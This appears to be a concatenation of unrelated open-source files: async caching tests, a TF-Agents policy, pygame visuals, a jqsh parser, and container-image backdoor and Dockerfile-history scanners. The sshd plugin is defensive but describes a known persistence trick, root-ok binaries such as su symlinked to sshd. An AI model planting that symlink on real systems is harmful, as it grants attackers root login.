assert test1 == {}
time.sleep(3)
assert test1 == {}
time.sleep(2)
assert test1 == {1: 'something', 2: 'something'}
time.sleep(5)
assert test1 == {1: 'something', 2: 'something', 3: 'something'}
assert test_class.sync_called == 1
def test_something_async():
test2 = dict()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
test_class = ExampleClass()
async def start1():
test2[1] = await test_class.func2()
async def start2():
await asyncio.sleep(3)
test2[2] = await test_class.func2()
async def start3():
await asyncio.sleep(10)
test2[3] = await test_class.func2()
async def assert1():
await asyncio.sleep(1)
assert test2 == {}
await asyncio.sleep(3)
assert test2 == {}
await asyncio.sleep(2)
assert test2 == {1: 'something', 2: 'something'}
await asyncio.sleep(5)
assert test2 == {1: 'something', 2: 'something', 3: 'something'}
assert test_class.async_called == 1
loop.run_until_complete(asyncio.gather(start1(), start2(), start3(), assert1()))
def test_exception_sync():
test_class = ExampleClass()
def start1():
try:
test_class.func3()
except Exception as e:
assert isinstance(e, ValueError)
def start2():
time.sleep(3)
try:
test_class.func3()
except Exception as e:
assert isinstance(e, ValueError)
def start3():
time.sleep(10)
try:
test_class.func3()
except Exception as e:
assert isinstance(e, ValueError)
Thread(target=start1).start()
Thread(target=start2).start()
Thread(target=start3).start()
time.sleep(11)
def test_exception_async():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
test_class = ExampleClass()
exception_count = 0
async def start1():
try:
await test_class.func4()
except Exception as e:
nonlocal exception_count
exception_count += 1
assert isinstance(e, ValueError)
async def start2():
await asyncio.sleep(3)
try:
await test_class.func4()
except Exception as e:
nonlocal exception_count
exception_count += 1
assert isinstance(e, ValueError)
async def start3():
await asyncio.sleep(10)
try:
await test_class.func4()
except Exception as e:
nonlocal exception_count
exception_count += 1
assert isinstance(e, ValueError)
loop.run_until_complete(asyncio.gather(start1(), start2(), start3()))
assert exception_count == 3
def test_something_property_sync():
test_class = ExampleClass()
test5 = dict()
def start1():
test5[1] = test_class.func5
def start2():
time.sleep(3)
test5[2] = test_class.func5
def start3():
time.sleep(7)
test5[3] = test_class.func5
def start4():
time.sleep(9)
test_class.func5 = 'something'
test5[4] = test_class.func5
def start5():
time.sleep(11)
test5[5] = test_class.func5
Thread(target=start1).start()
Thread(target=start2).start()
Thread(target=start3).start()
Thread(target=start4).start()
Thread(target=start5).start()
time.sleep(1)
assert test5 == {}
time.sleep(3)
assert test5 == {}
time.sleep(2)
assert test5 == {1: 'nothing', 2: 'nothing'}
time.sleep(2)
assert test5 == {1: 'nothing', 2: 'nothing', 3: 'nothing'}
assert test_class.sync_called == 1
time.sleep(2)
assert test5 == {1: 'nothing', 2: 'nothing', 3: 'nothing', 4: 'something'}
time.sleep(2)
assert test5 == {1: 'nothing', 2: 'nothing', 3: 'nothing', 4: 'something', 5: 'something'}
assert test_class.sync_called == 1
def test_something_property_async():
test6 = dict()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
test_class = ExampleClass()
async def start1():
test6[1] = await test_class.func6
async def start2():
await asyncio.sleep(3)
test6[2] = await test_class.func6
async def start3():
await asyncio.sleep(7)
test6[3] = await test_class.func6
async def start4():
await asyncio.sleep(9)
test_class.func6 = 'something'
test6[4] = await test_class.func6
async def start5():
await asyncio.sleep(11)
test6[5] = await test_class.func6
async def assert1():
await asyncio.sleep(1)
assert test6 == {}
await asyncio.sleep(3)
assert test6 == {}
await asyncio.sleep(2)
assert test6 == {1: 'nothing', 2: 'nothing'}
await asyncio.sleep(2)
assert test6 == {1: 'nothing', 2: 'nothing', 3: 'nothing'}
assert test_class.async_called == 1
await asyncio.sleep(2)
assert test6 == {1: 'nothing', 2: 'nothing', 3: 'nothing', 4: 'something'}
await asyncio.sleep(2)
assert test6 == {1: 'nothing', 2: 'nothing', 3: 'nothing', 4: 'something', 5: 'something'}
assert test_class.async_called == 1
loop.run_until_complete(asyncio.gather(start1(), start2(), start3(), start4(), start5(), assert1()))
def test_something_sync_crazy():
test_class = ExampleClass()
def start():
assert test_class.func1() == 'something'
[Thread(target=start).start() for _ in range(2000)]
time.sleep(6)
assert test_class.sync_called == 1
def test_something_async_crazy():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
test_class = ExampleClass()
async def start():
assert await test_class.func2() == 'something'
loop.run_until_complete(asyncio.gather(*[start() for _ in range(2000)]))
assert test_class.async_called == 1
def test_something_property_sync_crazy():
test_class = ExampleClass()
count = 0
def start():
nonlocal count
assert test_class.func5 == 'nothing'
count += 1
[Thread(target=start).start() for _ in range(2000)]
time.sleep(15) # safe value due to performance issue
assert count == 2000
assert test_class.sync_called == 1
test_class.func5 = 'something'
count = 0
def start2():
nonlocal count
assert test_class.func5 == 'something'
count += 1
[Thread(target=start2).start() for _ in range(2000)]
time.sleep(15) # safe value due to performance issue
assert count == 2000
assert test_class.sync_called == 1
def test_something_property_async_crazy():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
test_class = ExampleClass()
async def start():
assert await test_class.func6 == 'nothing'
loop.run_until_complete(asyncio.gather(*[start() for _ in range(2000)]))
assert test_class.async_called == 1
test_class.func6 = 'something'
async def start2():
assert await test_class.func6 == 'something'
loop.run_until_complete(asyncio.gather(*[start2() for _ in range(2000)]))
assert test_class.async_called == 1
``` |
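The tests above pin down the contract of these decorators: the decorated body runs once per instance, concurrent callers wait for (or await) the in-flight call, later calls reuse the cached value, and an exception raised by the body is seen by every caller. A minimal synchronous sketch of that caching behaviour, using the same `lazy` decorator:
```python
# Minimal sketch of the caching contract exercised by the tests above.
from lazy_async import lazy
import time

class Config:
    @lazy
    def value(self):
        time.sleep(1)       # stands in for expensive work; runs only once
        return 42

c = Config()
print(c.value())            # ~1 s: the body actually executes
print(c.value())            # immediate: the cached result is returned
```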
{
"source": "jqquanbeck/hpc-dino-game",
"score": 2
} |
#### File: jqquanbeck/hpc-dino-game/dinopolicy.py
```python
from __future__ import absolute_import, division, print_function
import base64
import imageio
import IPython
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import PIL.Image
import pyvirtualdisplay
import tensorflow as tf
from tf_agents.agents.dqn import dqn_agent
from tf_agents.drivers import dynamic_step_driver
from tf_agents.environments import suite_gym
from tf_agents.environments import tf_py_environment
from tf_agents.eval import metric_utils
from tf_agents.metrics import tf_metrics
from tf_agents.networks import q_network
from tf_agents.policies import random_tf_policy
from tf_agents.replay_buffers import tf_uniform_replay_buffer
from tf_agents.trajectories import trajectory
from tf_agents.utils import common
from tf_agents.policies import tf_policy
from tf_agents.specs import array_spec
from tf_agents.trajectories import policy_step
from tf_agents.trajectories import time_step as ts
from translator import *
class DinoPolicy(tf_policy.TFPolicy):
def __init__(self):
self._observation_spec = array_spec.BoundedArraySpec(
shape = (14,),
dtype = np.int32,
minimum = [0,0,0,0,0,0,0,0,0,0,0,0,0,0],
maximum = [
600,150,6, # Enemy 1
600,150,6, # Enemy 2
600,150,6, # Enemy 3
600,150,6, # Enemy 4
100,2147483647 # Dino Jump and Score
],
name = "observation"
)
self._action_spec = array_spec.BoundedArraySpec(
shape = (),
dtype = np.int32,
minimum = 0, # [Jump, None, Duck]
maximum = 2,
name = "action"
)
        super(DinoPolicy, self).__init__(time_step_spec=ts.time_step_spec(self._observation_spec),
                                         action_spec=self._action_spec)
    def _distribution(self, time_step, policy_state):
        pass
def _variables(self):
return ()
def _action(self, time_step, policy_state, seed):
observation_sign = tf.cast(tf.sign(time_step.observation[0]), dtype=tf.int32)
action = observation_sign + 1
return policy_step.PolicyStep(action, policy_state)
``` |
{
"source": "Jqqzzz/veinmind-tools",
"score": 2
} |
#### File: veinmind-backdoor/plugins/service.py
```python
from register import register
from common import *
import os
import re
@register.register("service")
class service():
service_dir_list = ["/etc/systemd/system"]
def detect(self, image):
results = []
for service_dir in self.service_dir_list:
for root, dirs, files in image.walk(service_dir):
for file in files:
try:
filepath = os.path.join(root, file)
f = image.open(filepath, mode="r")
f_content = f.read()
for backdoor_regex in regex.backdoor_regex_list:
if re.search(backdoor_regex, f_content):
r = result.Result()
r.image_id = image.id()
if len(image.reporefs()) > 0:
r.image_ref = image.reporefs()[0]
else:
r.image_ref = image.id()
r.filepath = filepath
r.description = "regex: " + backdoor_regex
results.append(r)
except FileNotFoundError:
continue
except BaseException as e:
log.logger.error(e)
return results
```
#### File: veinmind-backdoor/plugins/sshd.py
```python
from register import register
from common import log
from stat import *
from common import result
import os
@register.register("sshd")
class sshd():
"""
sshd 软连接后门检测插件,支持检测常规软连接后门
"""
rootok_list = ("su", "chsh", "chfn", "runuser")
def detect(self, image):
results = []
for root, dirs, files in image.walk("/"):
for f in files:
try:
filepath = os.path.join(root, f)
f_lstat = image.lstat(filepath)
if S_ISLNK(f_lstat.st_mode):
f_link = image.evalsymlink(filepath)
f_exename = filepath.split("/")[-1]
f_link_exename = f_link.split("/")[-1]
if f_exename in self.rootok_list and f_link_exename == "sshd":
r = result.Result()
r.image_id = image.id()
if len(image.reporefs()) > 0:
r.image_ref = image.reporefs()[0]
else:
r.image_ref = image.id()
r.filepath = filepath
r.description = "sshd symlink backdoor"
results.append(r)
except FileNotFoundError:
continue
except BaseException as e:
log.logger.error(e)
return results
```
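The plugin above walks the image filesystem and flags the classic sshd symlink backdoor: a binary name that PAM treats as root-ok (`su`, `chsh`, `chfn`, `runuser`) turned into a symlink whose target resolves to `sshd`. A hypothetical snippet that recreates the on-disk pattern `detect` looks for, purely for illustration:
```python
# Hypothetical: recreate the filesystem pattern flagged by the sshd plugin.
import os

os.symlink("/usr/sbin/sshd", "/tmp/su")   # basename "su" is in rootok_list,
print(os.readlink("/tmp/su"))             # and its target's basename is "sshd"
```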
#### File: veinmind-tools/veinmind-backdoor/register.py
```python
class register:
plugin_dict = {}
plugin_name = []
@classmethod
def register(cls, plugin_name):
def wrapper(plugin):
cls.plugin_dict[plugin_name] = plugin
return plugin
return wrapper
```
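`register` is a minimal class-level plugin registry: the decorator stores each plugin class in `register.plugin_dict` under the given name, which is how the `service` and `sshd` plugins above become discoverable to the scanner. A short usage sketch with a made-up plugin name:
```python
# Usage sketch for the decorator-based registry (the "demo" plugin is made up).
from register import register

@register.register("demo")
class demo:
    def detect(self, image):
        return []

print(register.plugin_dict["demo"])        # <class 'demo'>
plugin = register.plugin_dict["demo"]()    # instantiate a registered plugin by name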
#### File: veinmind-tools/veinmind-history/scan.py
```python
from veinmind import *
import os, sys
import re
import pytoml as toml
import jsonpickle
sys.path.append(os.path.join(os.path.dirname(__file__), "../veinmind-common/python/service"))
sys.path.append(os.path.join(os.path.dirname(__file__), "./veinmind-common/python/service"))
from report import *
report_list = []
instruct_set = (
"FROM", "CMD", "RUN", "LABEL", "MAINTAINER", "EXPOSE", "ENV", "ADD", "COPY", "ENTRYPOINT", "VOLUME", "USER",
"WORKDIR",
"ARG", "ONBUILD", "STOPSIGNAL", "HEALTHCHECK", "SHELL")
def load_rules():
global rules
with open(os.path.join(os.path.abspath(os.path.dirname(__file__)), "rules.toml"), encoding="utf8") as f:
rules = toml.load(f)
def tab_print(printstr: str):
if len(printstr) < 95:
print(("| " + printstr + "\t|").expandtabs(100))
else:
char_count = 0
printstr_temp = ""
for char in printstr:
char_count = char_count + 1
printstr_temp = printstr_temp + char
if char_count == 95:
char_count = 0
print(("| " + printstr_temp + "\t|").expandtabs(100))
printstr_temp = ""
print(("| " + printstr_temp + "\t|").expandtabs(100))
@command.group()
@command.option("--output", default="stdout", help="output format e.g. stdout/json")
def cli(output):
load_rules()
pass
@cli.image_command()
def scan_images(image):
"""scan image abnormal history instruction"""
image_report = None
refs = image.reporefs()
if len(refs) > 0:
ref = refs[0]
else:
ref = image.id()
log.info("start scan: " + ref)
ocispec = image.ocispec_v1()
if 'history' in ocispec.keys() and len(ocispec['history']) > 0:
for history in ocispec['history']:
if 'created_by' in history.keys():
created_by = history['created_by']
created_by_split = created_by.split("#(nop)")
if len(created_by_split) > 1:
command = "#(nop)".join(created_by_split[1:])
command = command.lstrip()
command_split = command.split()
if len(command_split) == 2:
instruct = command_split[0]
command_content = command_split[1]
for r in rules["rules"]:
if r["instruct"] == instruct:
if re.match(r["match"], command_content):
detail = AlertDetail()
detail.history_detail = HistoryDetail(
instruction=instruct, content=command_content,
description=r["match"]
)
image_report = ReportEvent(id=image.id(),
level=Level.High.value, detect_type=DetectType.Image.value,
event_type=EventType.Risk.value,
alert_type=AlertType.AbnormalHistory.value,
alert_details=[detail])
report(image_report)
break
else:
instruct = command_split[0]
command_content = " ".join(command_split[1:])
for r in rules["rules"]:
if r["instruct"] == instruct:
if re.match(r["match"], command_content):
detail = AlertDetail()
detail.history_detail = HistoryDetail(
instruction=instruct, content=command_content,
description=r["match"]
)
image_report = ReportEvent(id=image.id(),
level=Level.High.value, detect_type=DetectType.Image.value,
event_type=EventType.Risk.value,
alert_type=AlertType.AbnormalHistory.value,
alert_details=[detail])
report(image_report)
break
else:
command_split = created_by.split()
if command_split[0] in instruct_set:
for r in rules["rules"]:
if r["instruct"] == command_split[0]:
if re.match(r["match"], " ".join(command_split[1:])):
detail = AlertDetail()
detail.history_detail = HistoryDetail(
instruction=command_split[0],
content=" ".join(command_split[1:]),
description=r["match"]
)
image_report = ReportEvent(id=image.id(),
level=Level.High.value, detect_type=DetectType.Image.value,
event_type=EventType.Risk.value,
alert_type=AlertType.AbnormalHistory.value,
alert_details=[detail])
report(image_report)
break
else:
for r in rules["rules"]:
if r["instruct"] == "RUN":
if re.match(r["match"], created_by):
detail = AlertDetail()
detail.history_detail = HistoryDetail(
instruction="RUN", content=created_by,
description=r["match"]
)
image_report = ReportEvent(id=image.id(),
level=Level.High.value, detect_type=DetectType.Image.value,
event_type=EventType.Risk.value,
alert_type=AlertType.AbnormalHistory.value,
alert_details=[detail])
report(image_report)
break
if image_report != None:
report_list.append(image_report)
@cli.resultcallback()
def callback(result, output):
if output == "stdout" and len(report_list) > 0:
print("# ================================================================================================= #")
tab_print("Scan Image Total: " + str(len(report_list)))
tab_print("Unsafe Image List: ")
for r in report_list:
if len(r.alert_details) == 0:
continue
print(
"+---------------------------------------------------------------------------------------------------+")
tab_print("ImageName: " + r.id)
tab_print("Abnormal History Total: " + str(len(r.alert_details)))
for detail in r.alert_details:
if detail.history_detail:
tab_print("History: " + detail.history_detail.content)
print("+---------------------------------------------------------------------------------------------------+")
elif output == "json":
with open("output.json", mode="w") as f:
f.write(jsonpickle.dumps(report_list))
if __name__ == '__main__':
cli.add_info_command(manifest=command.Manifest(name="veinmind-history", author="veinmind-team", description="veinmind-history scan image abnormal history"))
cli()
``` |
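`scan_images` compares every Dockerfile-history entry against regex rules loaded from `rules.toml`, where each rule carries an `instruct` key (the Dockerfile instruction) and a `match` key (the regex applied to the instruction's arguments). A hypothetical Python mirror of that rule shape, showing the core matching step in isolation:
```python
# Hypothetical rule shaped like the entries scan.py loads from rules.toml.
import re

rules = {"rules": [{"instruct": "RUN", "match": r".*wget.*\|\s*(ba)?sh"}]}

created_by = "RUN wget http://example.com/a.sh | sh"
parts = created_by.split()
instruct, content = parts[0], " ".join(parts[1:])
for r in rules["rules"]:
    if r["instruct"] == instruct and re.match(r["match"], content):
        print("abnormal history:", created_by)
```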
{
"source": "jqrsound/EYESY_OS_for_RasPiSound",
"score": 3
} |
#### File: Python/S - A Zach Reactive/main.py
```python
import pygame
import pygame.gfxdraw
import random
import time
import math
from pygame.locals import *
# original code adapted from <NAME>'s talk
# https://www.youtube.com/watch?v=bmztlO9_Wvo
white=(255,255,255)
w1 = 0
h1 = 0
def setup(screen, etc) :
global w1,h1
w1 = screen.get_width()
h1 = screen.get_height()
pass
def draw(screen, etc):
global w1,h1
etc.color_picker_bg(etc.knob5)
#for i in range(320):
for i in range((h1 / 2) - 10):
i=i*2
color = (int(127 + 120 * math.sin(i * .01 + time.time())),
int(127 + 120 * math.sin(i * (.01 + etc.knob4*.01) + time.time())),
int(127 + 120 * math.sin(i * (.01 + etc.knob4*.02)+ time.time())))
r1= (abs(etc.audio_in[i/50]/900))
radius_1 = int(100 + r1+40 * math.sin(i * (etc.knob1 * .05)+.0001 + time.time()))
radius1 = int(etc.knob3 * radius_1)
radius_2 = int( 70 + r1 - 20 * math.sin(i * (etc.knob2 * .2)+.0001 + time.time()))
radius2 = int(etc.knob3 * radius_2)
xoffset1 = i
xpos1 = int(((w1 / 2)-i) * math.sin(i * .01 + (time.time()*0.3)) + (w1 / 2-i) + xoffset1)+ int(r1*1.5)
xpos2 = int(((w1 / 2)-i) * math.sin(i * .01 + (time.time()*0.3)) + (w1 / 2-i) + xoffset1+(h1 / 2))+ int(r1*1.5)#int(w1 // 2 + 100 * math.sin(i * .02 + time.time())*1.3)+(h1 / 2)+ int(r1*1.5)#-int(etc.knob1*(720-i))
xpos3 = int(((w1 / 2)-i) * math.sin(i * .01 + (time.time()*0.3)) + (w1 / 2-i) + xoffset1-+(h1 / 2))+ int(r1*1.5)#int(w1 // 2 + 100 * math.sin(i * .02 + time.time())*1.2)-(h1 / 2)+ int(r1*1.5)#-int(etc.knob1*(720-i))
rect2 = Rect(xpos2, i, radius2*1.5, radius2*1.5)
radius3=int(radius2+10+10 *(math.sin(i * (etc.knob2 * .2) + time.time())))
radius4=int(radius2+10+10 *(math.cos(i * (etc.knob1 * .2) + time.time())))
pygame.gfxdraw.circle(screen, xpos1, i, radius1, color)
pygame.gfxdraw.rectangle(screen, rect2, color)
pygame.gfxdraw.ellipse(screen, xpos3, i, radius3, radius4, color)
#pygame.gfxdraw.circle(screen, xpos3, i, radius2, color)
#pygame.gfxdraw.filled_circle(screen, xpos1, i, radius1, color)
#pygame.gfxdraw.filled_circle(screen, xpos2, i, radius2, color)
#pygame.gfxdraw.filled_circle(screen, xpos3, i, radius2, color)
#pygame.gfxdraw.circle(screen, xpos1, i, radius1, white )
#pygame.gfxdraw.circle(screen, xpos2, i, radius2, white )
#pygame.gfxdraw.circle(screen, xpos3, i, radius2, white )
```
#### File: Python/S - A Zach Spiral 01/main.py
```python
import pygame
import pygame.gfxdraw
import random
import time
import math
from pygame.locals import *
# original code adapted from <NAME>'s talk
# https://www.youtube.com/watch?v=bmztlO9_Wvo
#http://www.mathrecreation.com/2016/10/some-familiar-spirals-in-desmos.html
white=(255,255,255)
w1 = 0
h1 = 0
def setup(screen, etc) :
global w1,h1
w1 = screen.get_width()
h1 = screen.get_height()
pass
def draw(screen, etc):
global w1,h1
etc.color_picker_bg(etc.knob5)
#for i in range(320):
k=int(((h1 ))+((h1 )) *(math.sin(time.time()*(.1+etc.knob2*2))))
j=int(((h1 / 2)-10)+((h1 / 2)-10) *(math.cos(time.time()*(.8+1+etc.knob2))))
l=int((h1 )-25)-k
for i in range(0, (h1 +20) , 1):#+int(etc.knob1*15)):
i=i*2
color = (int(127 + 120 * math.sin(i * .01 + time.time())),
int(127 + 120 * math.sin(i * (.01 + etc.knob5*.01) + time.time())),
int(127 + 120 * math.sin(i * (.01 + etc.knob5*.02)+ time.time())))
r1= (abs(etc.audio_in[i%100]))#300
radius_2 = int( 50 - 20 * math.sin(i * (etc.knob2 * .2)+.0001 + time.time()))
radius2 = int((etc.knob3/2) * radius_2+(.4+etc.knob2/3)*(r1/400))
xoffset1 = i
xpos3= (w1 / 2)
ypos2 = (h1/2)
xpos4=int(xpos3+(20*etc.knob2+1)*math.sqrt(i)*math.cos(i*((1+math.sqrt(5)*math.pi/(math.pi+12*etc.knob1)))))
ypos3=int(ypos2+(20*etc.knob2+1)*math.sqrt(i)*math.sin(i*((1+math.sqrt(5)*math.pi/(math.pi+12*etc.knob1)))))
rect3 = Rect(xpos4, ypos3, radius2*1.5, radius2*1.5)
radius3=int(radius2+ (math.sin(i * (etc.knob2 * .2) + time.time())))
radius4=int(radius2+ (math.cos(i * (etc.knob2 * .2) + time.time())))
if (k-((h1*2)+30)*etc.knob4-5) <= i <= (k+((h1*2)+30)*etc.knob4+5) :
pygame.gfxdraw.ellipse(screen, xpos4, ypos3, radius3, radius4, color)
``` |
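The placement math in this mode is a Fermat-style spiral: each point sits at a radius proportional to the square root of i while the angle advances by a fixed, knob-scaled increment per step, which produces the phyllotaxis-like pattern from the linked article. A stripped-down sketch of just that placement, with `cx`, `cy` and `scale` as assumed inputs and a golden-angle default rather than the patch's knob-driven increment:
```python
# Minimal sketch of the sqrt-radius / constant-angle spiral used in draw().
import math

def spiral_point(i, cx, cy, scale=4.0, angle_step=math.pi * (3 - math.sqrt(5))):
    r = scale * math.sqrt(i)    # radius grows with sqrt(i) (Fermat spiral)
    theta = i * angle_step      # constant angular step per point
    return cx + r * math.cos(theta), cy + r * math.sin(theta)

print(spiral_point(10, 640, 360))
```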
{
"source": "jq-shell/python-jqsh",
"score": 3
} |
#### File: python-jqsh/jqsh/context.py
```python
import copy


class FilterContext:
def __copy__(self):
ret = FilterContext()
ret.argv = self.argv[:]
ret.is_main = self.is_main
return ret
def __init__(self):
"""Creates the default context."""
import jqsh.functions
self.argv = []
self.get_builtin = jqsh.functions.get_builtin
self.is_main = True
@classmethod
def command_line_context(cls, argv):
ret = cls()
ret.argv = list(argv)
return ret
def imported(self):
"""Returns a copy of self with is_main set to False."""
ret = copy.copy(self)
ret.is_main = False
return ret
```
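`FilterContext` mostly carries `argv` and the `is_main` flag; `imported()` hands an imported jqsh module a copy that knows it is not the entry point. A quick sketch (the script name is illustrative):
```python
# Sketch of the is_main flag flipping for imported modules.
import jqsh.context

ctx = jqsh.context.FilterContext.command_line_context(["script.jqsh"])
print(ctx.is_main)             # True for the top-level program
print(ctx.imported().is_main)  # False for the copy handed to an import
```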
#### File: python-jqsh/jqsh/parser.py
```python
import decimal
import enum
import jqsh.context
import jqsh.filter
import jqsh.values
import string
import unicodedata
class Incomplete(Exception):
pass
TokenType = enum.Enum('TokenType', [
'assign',
'close_array',
'close_object',
'close_paren',
'colon',
'comma',
'command',
'comment',
'dot',
'format_string',
'global_variable',
'illegal',
'minus',
'modulo',
'multiply',
'name',
'number',
'open_array',
'open_object',
'open_paren',
'pipe',
'plus',
'semicolon',
'string',
'string_end',
'string_end_incomplete',
'string_incomplete',
'string_middle',
'string_start',
'trailing_whitespace'
], module=__name__)
class Token:
def __eq__(self, other):
return self.type is other.type and self.text == other.text
def __init__(self, token_type, token_string=None, text=None, line=None, column=None):
self.type = token_type
self.string = token_string # ''.join(token.string for token in tokenize(jqsh_string)) == jqsh_string
self.text = text # metadata like the name of a name token or the digits of a number literal. None for simple tokens
self.line = line
self.column = column
def __repr__(self):
return 'jqsh.parser.Token(' + repr(self.type) + ('' if self.string is None else ', token_string=' + repr(self.string)) + ('' if self.text is None else ', text=' + repr(self.text)) + ')'
def __str__(self):
if self.string is None:
return "'" + repr(self) + "'"
else:
return self.string
atomic_tokens = {
TokenType.name: jqsh.filter.Name,
TokenType.number: jqsh.filter.NumberLiteral,
TokenType.string: jqsh.filter.StringLiteral
}
escapes = { # string literal escape sequences, sans \u and \(
'"': '"',
'/': '/',
'\\': '\\',
'b': '\b',
'f': '\f',
'n': '\n',
'r': '\r',
't': '\t'
}
json_tokens = [ # token types that are allowed in pure JSON
TokenType.close_array,
TokenType.close_object,
TokenType.colon,
TokenType.comma,
TokenType.name,
TokenType.number,
TokenType.open_array,
TokenType.open_object,
TokenType.string
]
keyword_paren_filters = {
'if': jqsh.filter.Conditional,
'try': jqsh.filter.Try
}
keyword_parens = { # a dictionary that maps starting keywords of keyword parens to the possible inner keywords. All keyword parens end with the “end” keyword.
'if': {'then', 'elif', 'elseIf', 'else'},
'try': {'catch', 'then', 'except', 'else'}
}
matching_parens = { # a dictionary that maps opening parenthesis-like tokens (parens) to the associated closing parens
TokenType.open_array: TokenType.close_array,
TokenType.open_object: TokenType.close_object,
TokenType.open_paren: TokenType.close_paren
}
operators = [
{
'binary': False,
TokenType.command: jqsh.filter.Command,
TokenType.global_variable: jqsh.filter.GlobalVariable
},
{
TokenType.dot: jqsh.filter.Apply
},
'variadic apply',
{
TokenType.multiply: jqsh.filter.Multiply
},
{
TokenType.plus: jqsh.filter.Add
},
{
TokenType.colon: jqsh.filter.Pair
},
{
TokenType.comma: jqsh.filter.Comma
},
{
TokenType.assign: jqsh.filter.Assign
},
{
'rtl': True,
TokenType.pipe: jqsh.filter.Pipe
},
{
TokenType.semicolon: jqsh.filter.Semicolon
}
]
paren_filters = {
TokenType.open_array: jqsh.filter.Array,
TokenType.open_object: jqsh.filter.Object,
TokenType.open_paren: jqsh.filter.Parens
}
symbols = {
'!': TokenType.command,
'$': TokenType.global_variable,
'%': TokenType.modulo,
'(': TokenType.open_paren,
')': TokenType.close_paren,
'*': TokenType.multiply,
'+': TokenType.plus,
',': TokenType.comma,
'-': TokenType.minus,
'.': TokenType.dot,
':': TokenType.colon,
';': TokenType.semicolon,
'=': TokenType.assign,
'@': TokenType.format_string,
'[': TokenType.open_array,
']': TokenType.close_array,
'{': TokenType.open_object,
'|': TokenType.pipe,
'}': TokenType.close_object
}
def illegal_token_exception(token, position=None, expected=None, line_numbers=False):
if token.type is TokenType.illegal and token.text:
return SyntaxError('illegal character' + ((' in line ' + str(token.line) if line_numbers and token.line is not None else '') if position is None else ' at position ' + repr(position)) + ': ' + repr(token.text[0]) + ' (U+' + format(ord(token.text[0]), 'x').upper() + ' ' + unicodedata.name(token.text[0], 'unknown character') + ')')
else:
return SyntaxError('illegal ' + ('' if token.type is TokenType.illegal else token.type.name + ' ') + 'token' + ((' in line ' + str(token.line) if line_numbers and token.line is not None else '') if position is None else ' at position ' + repr(position)) + ('' if expected is None else ' (expected ' + ' or '.join(sorted(expected_token_type.name for expected_token_type in expected)) + ')'))
def parse(tokens, *, line_numbers=False, allowed_filters={'default': True}, context=jqsh.context.FilterContext()):
def filter_is_allowed(the_filter):
if isinstance(allowed_filters, dict):
if the_filter.__class__ in allowed_filters:
if isinstance(allowed_filters[the_filter.__class__], bool):
return allowed_filters[the_filter.__class__]
else:
return allowed_filters[the_filter.__class__](the_filter)
else:
if isinstance(allowed_filters.get('default', False), bool):
return allowed_filters.get('default', False)
else:
return allowed_filters['default'](the_filter)
elif the_filter.__class__ in allowed_filters:
return True
else:
return False
def make_keyword_paren_filter(attributes):
attributes = list(attributes)
return keyword_paren_filters[attributes[0][0]]((attribute_name, parse(attribute_tokens, line_numbers=line_numbers, allowed_filters=allowed_filters, context=context)) for attribute_name, attribute_tokens in attributes)
def raise_for_filter(the_filter):
if filter_is_allowed(the_filter):
return the_filter
else:
raise jqsh.filter.NotAllowed('disallowed filter: ' + str(the_filter))
if isinstance(tokens, str):
tokens = list(tokenize(tokens))
tokens = [token for token in tokens if isinstance(token, jqsh.filter.Filter) or token.type is not TokenType.comment]
if not len(tokens):
return raise_for_filter(jqsh.filter.Filter()) # token list is empty, return an empty filter
for token in tokens:
if token.type is TokenType.illegal:
raise illegal_token_exception(token, line_numbers=line_numbers)
if isinstance(tokens[-1], Token) and tokens[-1].type is TokenType.trailing_whitespace:
if len(tokens) == 1:
return raise_for_filter(jqsh.filter.Filter()) # token list consists entirely of whitespace, return an empty filter
else:
tokens[-2].string += tokens[-1].string # merge the trailing whitespace into the second-to-last token
tokens.pop() # remove the trailing_whitespace token
# parenthesis-like filters
paren_balance = 0
paren_start = None
middle_keywords = []
for i, token in reversed(list(enumerate(tokens))): # iterating over the token list in reverse because we modify it in the process
if not isinstance(token, Token):
continue
elif token.type in matching_parens.values() or token == Token(TokenType.name, text='end'):
if paren_balance == 0:
paren_start = i
if token == Token(TokenType.name, text='end'):
middle_keywords = []
paren_balance += 1
elif token.type in matching_parens.keys() or token.type is TokenType.name and token.text in keyword_parens.keys():
paren_balance -= 1
if paren_balance < 0:
raise Incomplete('too many opening parens of type ' + repr(token.text if token.type is TokenType.name else token.type))
elif paren_balance == 0:
if token.type is TokenType.name:
middle_keywords = [index for index in middle_keywords if tokens[index].text in keyword_parens[token.text]]
attributes = []
last_index = paren_start
for index in middle_keywords:
attributes.append((tokens[index].text, tokens[index + 1:last_index]))
last_index = index
attributes.append((token.text, tokens[i + 1:last_index]))
tokens[i:paren_start + 1] = [raise_for_filter(make_keyword_paren_filter(reversed(attributes)))]
else:
if matching_parens[token.type] is tokens[paren_start].type:
tokens[i:paren_start + 1] = [raise_for_filter(paren_filters[token.type](attribute=parse(tokens[i + 1:paren_start], line_numbers=line_numbers, allowed_filters=allowed_filters)))] # parse the inside of the parens
else:
raise SyntaxError('opening paren of type ' + repr(token.type) + ' does not match closing paren of type ' + repr(tokens[paren_start].type))
paren_start = None
elif paren_balance == 1 and token.type is TokenType.name:
middle_keywords.append(i)
if paren_balance != 0:
raise SyntaxError('mismatched parens')
# atomic filters
for i, token in reversed(list(enumerate(tokens))):
if isinstance(token, Token) and token.type in atomic_tokens:
tokens[i] = raise_for_filter(atomic_tokens[token.type](token.text))
# operators
for precedence_group in operators:
if precedence_group == 'variadic apply':
start = None
for i, token in reversed(list(enumerate(tokens))):
if isinstance(token, jqsh.filter.Filter):
if start is None:
start = i
else:
if start is not None and start > i + 1:
tokens[i + 1:start + 1] = [raise_for_filter(jqsh.filter.Apply(*tokens[i + 1:start + 1]))]
start = None
if start is not None and start > 0:
tokens[:start + 1] = [raise_for_filter(jqsh.filter.Apply(*tokens[:start + 1]))]
continue
if not precedence_group.get('binary', True):
for i, token in reversed(list(enumerate(tokens))):
if isinstance(token, Token) and token.type in precedence_group:
if len(tokens) == i + 1:
raise SyntaxError('expected a filter after ' + repr(token) + ', nothing found')
elif isinstance(tokens[i + 1], Token):
raise SyntaxError('expected a filter after ' + repr(token) + ', found ' + repr(tokens[i + 1]) + ' instead')
tokens[i:i + 2] = [raise_for_filter(precedence_group[token.type](attribute=tokens[i + 1]))]
continue
ltr = not precedence_group.get('rtl', False)
if ltr:
tokens.reverse()
left_operand = None
right_operand = None
has_previous_operand = False
has_next_operand = False
